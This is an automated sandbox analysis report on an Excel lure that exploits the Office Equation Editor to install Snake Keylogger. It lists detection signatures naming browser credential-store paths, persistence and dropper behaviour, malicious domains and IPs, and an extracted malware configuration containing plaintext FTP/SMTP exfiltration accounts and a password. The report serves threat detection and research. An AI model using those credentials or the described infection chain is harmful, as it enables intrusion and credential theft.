12.2.RegSvcs.exe.3415570.4.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x24d0a:$a1: get_encryptedPassword 0x5bc22:$a1: get_encryptedPassword 0x24cde:$a2: get_encryptedUsername 0x5bbf6:$a2: get_encryptedUsername 0x24da2:$a3: get_timePasswordChanged 0x5bcba:$a3: get_timePasswordChanged 0x24cba:$a4: get_passwordField 0x5bbd2:$a4: get_passwordField 0x24d20:$a5: set_encryptedPassword 0x5bc38:$a5: set_encryptedPassword 0x24aed:$a7: get_logins 0x5ba05:$a7: get_logins 0x211cd:$a10: KeyLoggerEventArgs 0x580e5:$a10: KeyLoggerEventArgs 0x2119c:$a11: KeyLoggerEventArgsEventHandler 0x580b4:$a11: KeyLoggerEventArgsEventHandler 0x24bc1:$a13: _encryptedPassword 0x5bad9:$a13: _encryptedPassword
12.2.RegSvcs.exe.3415570.4.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x2a9ff:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x61917:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x29c30:$a3: \Google\Chrome\User Data\Default\Login Data 0x60b48:$a3: \Google\Chrome\User Data\Default\Login Data 0x2a063:$a4: \Orbitum\User Data\Default\Login Data 0x60f7b:$a4: \Orbitum\User Data\Default\Login Data 0x2b0a4:$a5: \Kometa\User Data\Default\Login Data 0x61fbc:$a5: \Kometa\User Data\Default\Login Data
12.2.RegSvcs.exe.3415570.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x235f7:$s1: UnHook 0x5a50f:$s1: UnHook 0x23593:$s2: SetHook 0x5a4ab:$s2: SetHook 0x235cc:$s3: CallNextHook 0x5a4e4:$s3: CallNextHook 0x2355b:$s4: _hook 0x5a473:$s4: _hook
12.2.RegSvcs.exe.3415570.4.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x28115:$x1: $%SMTPDV$ 0x5f02d:$x1: $%SMTPDV$ 0x2697e:$x2: $#TheHashHere%& 0x5d896:$x2: $#TheHashHere%& 0x2692c:$x3: %FTPDV$ 0x5d844:$x3: %FTPDV$ 0x281eb:$x4: $%TelegramDv$ 0x5f103:$x4: $%TelegramDv$ 0x2119c:$x5: KeyLoggerEventArgs 0x211cd:$x5: KeyLoggerEventArgs 0x580b4:$x5: KeyLoggerEventArgs 0x580e5:$x5: KeyLoggerEventArgs 0x280e1:$m2: Clipboard Logs ID 0x282e7:$m2: Screenshot Logs ID 0x283b3:$m2: keystroke Logs ID 0x5eff9:$m2: Clipboard Logs ID 0x5f1ff:$m2: Screenshot Logs ID 0x5f2cb:$m2: keystroke Logs ID 0x282bf:$m4: \SnakeKeylogger\ 0x5f1d7:$m4: \SnakeKeylogger\
Click to see the 121 entries

Sigma Signatures

Exploits

Sigma detected: EQNEDT32.EXE connecting to internet

Source: Network Connection

Author: Joe Security: Data: DestinationIp: 38.242.255.115, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1924, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49163

Sigma detected: File Dropped By EQNEDT32EXE

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1924, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\T76434567000[1].exe

System Summary

Sigma detected: Equation Editor Network Connection

Source: Network Connection

Author: Max Altgelt (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49163, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1924, Protocol: tcp, SourceIp: 38.242.255.115, SourceIsIpv6: false, SourcePort: 80

Sigma detected: Suspicious Binary In User Directory Spawned From Office Application

Source: Process started

Author: Jason Lynch: Data: Command: C:\Users\user\AppData\Roaming\negrett.exe, CommandLine: C:\Users\user\AppData\Roaming\negrett.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\negrett.exe, NewProcessName: C:\Users\user\AppData\Roaming\negrett.exe, OriginalFileName: C:\Users\user\AppData\Roaming\negrett.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1924, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: C:\Users\user\AppData\Roaming\negrett.exe, ProcessId: 1500, ProcessName: negrett.exe

Sigma detected: Suspicious Microsoft Office Child Process

Source: Process started

Author: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: C:\Users\user\AppData\Roaming\negrett.exe, CommandLine: C:\Users\user\AppData\Roaming\negrett.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\negrett.exe, NewProcessName: C:\Users\user\AppData\Roaming\negrett.exe, OriginalFileName: C:\Users\user\AppData\Roaming\negrett.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1924, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: C:\Users\user\AppData\Roaming\negrett.exe, ProcessId: 1500, ProcessName: negrett.exe

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1244, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" , ProcessId: 2644, ProcessName: wscript.exe

Sigma detected: Suspicious DNS Query for IP Lookup Service APIs

Source: DNS query

Author: Brandon George (blog post), Thomas Patzke: Data: Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, QueryName: checkip.dyndns.org

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1244, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs" , ProcessId: 2644, ProcessName: wscript.exe

Sigma detected: Modification of IE Registry Settings

Source: Registry Key set

Author: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1924, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings

Data Obfuscation

Sigma detected: Drops script at startup location

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\directory\name.exe, ProcessId: 2504, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: Orden de compra 0001-00255454.xlam.xlsx

Avira: detected

Antivirus detection for URL or domain

Source: https://scratchdreams.tk	Avira URL Cloud: Label: malware
Source: https://scratchdreams.tk/_send_.php?TS	Avira URL Cloud: Label: malware

Found malware configuration

Source: 0000000C.00000002.887588429.0000000000665000.00000004.00000020.00020000.00000000.sdmp

Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "FTP Server": "ftp://ftp.antoniomayol.com/", "FTP Username": "johnson@antoniomayol.com", "Password": "DAIpro123**", "Username": "contabilidad@daipro.com.mx", "Host": "mail.daipro.com.mx", "Port": "587"}

Multi AV Scanner detection for domain / URL

Source: https://scratchdreams.tk	Virustotal: Detection: 18%			Perma Link
Source: https://scratchdreams.tk/_send_.php?TS	Virustotal: Detection: 16%			Perma Link

Multi AV Scanner detection for submitted file

Source: Orden de compra 0001-00255454.xlam.xlsx	Virustotal: Detection: 55%			Perma Link
Source: Orden de compra 0001-00255454.xlam.xlsx	ReversingLabs: Detection: 68%

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\negrett.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\directory\name.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\T76434567000[1].exe	Joe Sandbox ML: detected

Exploits

Office equation editor establishes network connection

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Network connect: IP: 38.242.255.115 Port: 80			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Network connect: IP: 38.242.255.115 Port: 443			Jump to behavior

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\negrett.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\negrett.exe			Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

Source: unknown	HTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.22:49166 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.22:49169 version: TLS 1.0

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: unknown

HTTPS traffic detected: 38.242.255.115:443 -> 192.168.2.22:49164 version: TLS 1.2

Source:	Binary string: _.pdb source: RegSvcs.exe, 00000009.00000002.887613272.00000000009E8000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887535540.0000000000820000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887588429.0000000000665000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.888025081.0000000003411000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: name.exe, 00000008.00000003.776938516.0000000002CD0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000008.00000003.777173422.0000000000E10000.00000004.00001000.00020000.00000000.sdmp, name.exe, 0000000B.00000003.811942051.00000000011D0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 0000000B.00000003.813355111.0000000002B70000.00000004.00001000.00020000.00000000.sdmp

Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_2_00B7DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	5_2_00B7DBBE
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_2_00B4C2A2 FindFirstFileExW,	5_2_00B4C2A2
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_2_00B868EE FindFirstFileW,FindClose,	5_2_00B868EE
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_2_00B8698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	5_2_00B8698F
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_0105DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	8_2_0105DBBE
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_0102C2A2 FindFirstFileExW,	8_2_0102C2A2
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_0106698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	8_2_0106698F
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_010668EE FindFirstFileW,FindClose,	8_2_010668EE
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_0105D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	8_2_0105D076
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_0105D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	8_2_0105D3A9
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_0106979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	8_2_0106979D
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_01069642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	8_2_01069642
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_01069B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	8_2_01069B2B
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_01065C97 FindFirstFileW,FindNextFileW,FindClose,	8_2_01065C97
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_0139DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	11_2_0139DBBE
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_0136C2A2 FindFirstFileExW,	11_2_0136C2A2
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_013A698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	11_2_013A698F
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_013A68EE FindFirstFileW,FindClose,	11_2_013A68EE
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_0139D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	11_2_0139D076
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_0139D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	11_2_0139D3A9
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_013A979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	11_2_013A979D
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_013A9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	11_2_013A9642
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_013A9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	11_2_013A9B2B
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_013A5C97 FindFirstFileW,FindNextFileW,FindClose,	11_2_013A5C97

Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\	Jump to behavior

Software Vulnerabilities

Document exploit detected (process start blacklist hit)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Shellcode detected

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_035306F5 WinExec,ExitProcess,	2_2_035306F5
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_03530715 ExitProcess,	2_2_03530715
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_03530631 LoadLibraryW,	2_2_03530631
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_035306AA URLDownloadToFileW,	2_2_035306AA
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_0353064B URLDownloadToFileW,	2_2_0353064B

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	9_2_003DDC68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00A87110h	9_2_00A86CF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00A86B19h	9_2_00A86858
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00A84CA5h	9_2_00A84AB8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00A8562Fh	9_2_00A84AB8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00A85999h	9_2_00A856D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	9_2_00A83FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00A87110h	9_2_00A86CE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00A87110h	9_2_00A8703F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00A8F979h	9_2_00A8F6D1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00A8F0C9h	9_2_00A8EE21
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00A8F521h	9_2_00A8F279
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00A86259h	9_2_00A85FA4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00A866B9h	9_2_00A863F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00A8FDD1h	9_2_00A8FB29
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00A85DF9h	9_2_00A85B47
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00D24869h	9_2_00D245C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00D20B99h	9_2_00D208F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00D218A1h	9_2_00D215F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00D2A18Ah	9_2_00D29EE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00D2AE91h	9_2_00D2ABE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00D2AA39h	9_2_00D2A790
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00D20741h	9_2_00D20498
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00D2B7D5h	9_2_00D2B498
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00D22E59h	9_2_00D22BB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00D29459h	9_2_00D291B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00D23B61h	9_2_00D238B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00D21449h	9_2_00D211A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00D22151h	9_2_00D21EA8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00D28751h	9_2_00D284A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00D21CF9h	9_2_00D21A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00D22A01h	9_2_00D22758
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	9_2_00D26258
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00D29001h	9_2_00D28D58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00D202E9h	9_2_00D20040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00D2B2E9h	9_2_00D2B040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	9_2_00D2624A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00D20FF1h	9_2_00D20D48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00D23709h	9_2_00D23460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00D29D09h	9_2_00D29A60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00D24411h	9_2_00D24168
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00D23FB9h	9_2_00D23D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00D225A9h	9_2_00D22300
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00D28BA9h	9_2_00D28900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00D232B1h	9_2_00D23008
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00D298B1h	9_2_00D29608
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00D2A5E1h	9_2_00D2A338
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 00D282D1h	9_2_00D28028

Source: global traffic	DNS query: name: baitalasma.com
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: reallyfreegeoip.org
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: reallyfreegeoip.org
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: checkip.dyndns.org

Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 172.67.177.134:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 172.67.177.134:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.21.67.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.21.67.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 38.242.255.115:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 158.101.44.242:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 158.101.44.242:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 158.101.44.242:80
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 158.101.44.242:80
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 158.101.44.242:80
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 158.101.44.242:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
